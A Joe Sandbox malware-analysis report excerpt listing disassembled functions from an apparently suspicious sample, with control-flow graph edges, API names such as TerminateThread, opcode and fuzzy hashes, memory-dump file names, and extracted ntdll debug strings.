                                                                                                                                                      control_flow_graph 55 573a0a-573ad5 TerminateThread 60 573c8d-573ca8 55->60 61 573adb-573aea 55->61 61->60 62 573af0-573af4 61->62 62->60 63 573afa-573afe 62->63 63->60 64 573b04-573b08 63->64 64->60 65 573b0e-573b12 64->65 65->60 66 573b18-573b1c 65->66 66->60 67 573b22-573b73 66->67 67->60 69 573b79-573b99 67->69 70 573b9a-573bee 69->70 72 573bf0-573bf9 70->72 73 573c0a-573c88 70->73 72->60 74 573bff-573c00 72->74 74->70
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction ID: bc08c85ab9d2c9d343e95195effa871b2f444796aed871d6a632edf5ab34a563
                                                                                                                                                      • Opcode Fuzzy Hash: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction Fuzzy Hash: 1E41A56B50D3525DE3028B10A2667E1BBD4FF55330F2689D6C0484F8A3C3A4CA99E745
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057393C, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 100 57393c-573942 101 573945-5739a7 100->101 103 5739a9-573ad5 TerminateThread 101->103 108 573c8d-573ca8 103->108 109 573adb-573aea 103->109 109->108 110 573af0-573af4 109->110 110->108 111 573afa-573afe 110->111 111->108 112 573b04-573b08 111->112 112->108 113 573b0e-573b12 112->113 113->108 114 573b18-573b1c 113->114 114->108 115 573b22-573b73 114->115 115->108 117 573b79-573b99 115->117 118 573b9a-573bee 117->118 120 573bf0-573bf9 118->120 121 573c0a-573c88 118->121 120->108 122 573bff-573c00 120->122 122->118
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction ID: 8667f550440916ec2f7b58409cbcdb413f26ea62607c084faa644e4b1b6eed29
                                                                                                                                                      • Opcode Fuzzy Hash: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction Fuzzy Hash: 414146766083429ED7158F10E6697E57BE5FF51330F2AC19AC8884F4A2C3748EC8E706
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 005738E3, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 76 5738e3-573942 77 573945-5739a7 76->77 79 5739a9-573ad5 TerminateThread 77->79 84 573c8d-573ca8 79->84 85 573adb-573aea 79->85 85->84 86 573af0-573af4 85->86 86->84 87 573afa-573afe 86->87 87->84 88 573b04-573b08 87->88 88->84 89 573b0e-573b12 88->89 89->84 90 573b18-573b1c 89->90 90->84 91 573b22-573b73 90->91 91->84 93 573b79-573b99 91->93 94 573b9a-573bee 93->94 96 573bf0-573bf9 94->96 97 573c0a-573c88 94->97 96->84 98 573bff-573c00 96->98 98->94
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction ID: e4b834a99808c24829cc836432caadc5463e9b8e65de938dfda81cc6e4c788c1
                                                                                                                                                      • Opcode Fuzzy Hash: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction Fuzzy Hash: E831E5316043429FDB248E6498AD7E63BE6AF61370F5AC15ECC895B5A5C3344EC8EB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A80, Relevance: 1.6, APIs: 1, Instructions: 126threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 124 573a80-573ac2 126 573a45-573a7b TerminateThread 124->126 127 573ac3-573ad5 124->127 126->127 129 573c8d-573ca8 127->129 130 573adb-573aea 127->130 130->129 131 573af0-573af4 130->131 131->129 133 573afa-573afe 131->133 133->129 134 573b04-573b08 133->134 134->129 135 573b0e-573b12 134->135 135->129 136 573b18-573b1c 135->136 136->129 137 573b22-573b73 136->137 137->129 139 573b79-573b99 137->139 140 573b9a-573bee 139->140 142 573bf0-573bf9 140->142 143 573c0a-573c88 140->143 142->129 144 573bff-573c00 142->144 144->140
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction ID: 04626be7a60500f4d69c9dc3410d9ad7c775395f08d9232205b9385961f930d1
                                                                                                                                                      • Opcode Fuzzy Hash: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction Fuzzy Hash: 1531F87650C342AED7128B50E2657E1BFE5FF51330F1AC6EAC4884F4A2C3648E89E741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573962, Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 146 573962-573967 147 57396c-57397d 146->147 148 573969-57396b 146->148 147->146 150 57397f-573982 147->150 148->147 149 573938-573942 148->149 153 573945-573959 149->153 152 5739a1-5739a7 150->152 152->153 154 5739a9-573ad5 TerminateThread 152->154 153->152 159 573c8d-573ca8 154->159 160 573adb-573aea 154->160 160->159 161 573af0-573af4 160->161 161->159 162 573afa-573afe 161->162 162->159 163 573b04-573b08 162->163 163->159 164 573b0e-573b12 163->164 164->159 165 573b18-573b1c 164->165 165->159 166 573b22-573b73 165->166 166->159 168 573b79-573b99 166->168 169 573b9a-573bee 168->169 171 573bf0-573bf9 169->171 172 573c0a-573c88 169->172 171->159 173 573bff-573c00 171->173 173->169
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction ID: 8ddcd0d44c8858b006ed1bc30ba19ea6a6cafe3fc84304b6bbf551d67586afb2
                                                                                                                                                      • Opcode Fuzzy Hash: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction Fuzzy Hash: 3B311631604252DFDB248E54D8A97EA3BA6BF51770F5AC16DCC895B096C3344EC8FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A84, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 175 573a84-573a89 176 573a8e-573a9f 175->176 177 573a8b-573a8d 175->177 176->175 179 573aa1-573aa4 176->179 177->176 178 573a5a-573a6a TerminateThread 177->178 180 573a71-573a7b 178->180 181 573ac3-573ad5 179->181 180->181 182 573c8d-573ca8 181->182 183 573adb-573aea 181->183 183->182 184 573af0-573af4 183->184 184->182 185 573afa-573afe 184->185 185->182 186 573b04-573b08 185->186 186->182 187 573b0e-573b12 186->187 187->182 188 573b18-573b1c 187->188 188->182 189 573b22-573b73 188->189 189->182 191 573b79-573b99 189->191 192 573b9a-573bee 191->192 194 573bf0-573bf9 192->194 195 573c0a-573c88 192->195 194->182 196 573bff-573c00 194->196 196->192
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29453095155.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction ID: 2935a12e35e4fb019373a573e57aa9ab3b4d54fb8497dd3697fb2a6d5c38e061
                                                                                                                                                      • Opcode Fuzzy Hash: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction Fuzzy Hash: 2821D5356002069FDB258E10D4A9BE57F96BF51774F4AC29DC4890B095C3388EC9FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 198 1e8f2b2a-1e8f2b2f 199 1e8f2b3f-1e8f2b46 LdrInitializeThunk 198->199 200 1e8f2b31-1e8f2b38 198->200
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
                                                                                                                                                      • Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 1E95FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      • Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
                                                                                                                                                      • Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8C0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
                                                                                                                                                      • Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
                                                                                                                                                      • Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CCF00, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8CD2C4
                                                                                                                                                        • Part of subcall function 1E938514: RtlDebugPrintTimes.NTDLL ref: 1E938579
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (,p$x-p
                                                                                                                                                      • API String ID: 3446177414-3978274645
                                                                                                                                                      • Opcode ID: ee61efc8f23f51817f5ac008fb852cc6471b016651712ac80cb5a8aa263f1dac
                                                                                                                                                      • Instruction ID: 6952973b656c954eb8d95102ee6b9e61515b825fa185ee9abb4c7b09037b26af
                                                                                                                                                      • Opcode Fuzzy Hash: ee61efc8f23f51817f5ac008fb852cc6471b016651712ac80cb5a8aa263f1dac
                                                                                                                                                      • Instruction Fuzzy Hash: 02D1D734A003699FEB14DF29C890BDAB7B2BF86304F054699D909A72C1DB74ED85CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      • Opcode ID: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction ID: ba22ce24be896bb6e49efbbea1a5bf780cbd73c5d388c40602c0ebde9fa07885
                                                                                                                                                      • Opcode Fuzzy Hash: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction Fuzzy Hash: E1A18E7161821A8FC745CE28C894E2AB7E6FF98314F054A6EE945DB360E7B4EC41CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction ID: 9f5fd33b0901870ab60edc0c253b26bc7fb6f5b3a6bf0ba6dd0cd328526627c2
                                                                                                                                                      • Opcode Fuzzy Hash: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction Fuzzy Hash: 4E512835A00259BBEF10ABE9DC95FAD73B9EF49304F000BADE505A76C0E771AA458F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      • Opcode ID: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction ID: b0f5a561f0e14f9883b8801090afa7116563c0963e45700da961217d5cbd5f86
                                                                                                                                                      • Opcode Fuzzy Hash: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction Fuzzy Hash: F5E1D170A043468FD715CF65C9A0B9AF7E6BF86224F104BADE866CB2D0D731D845CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      • Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
                                                                                                                                                      • Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
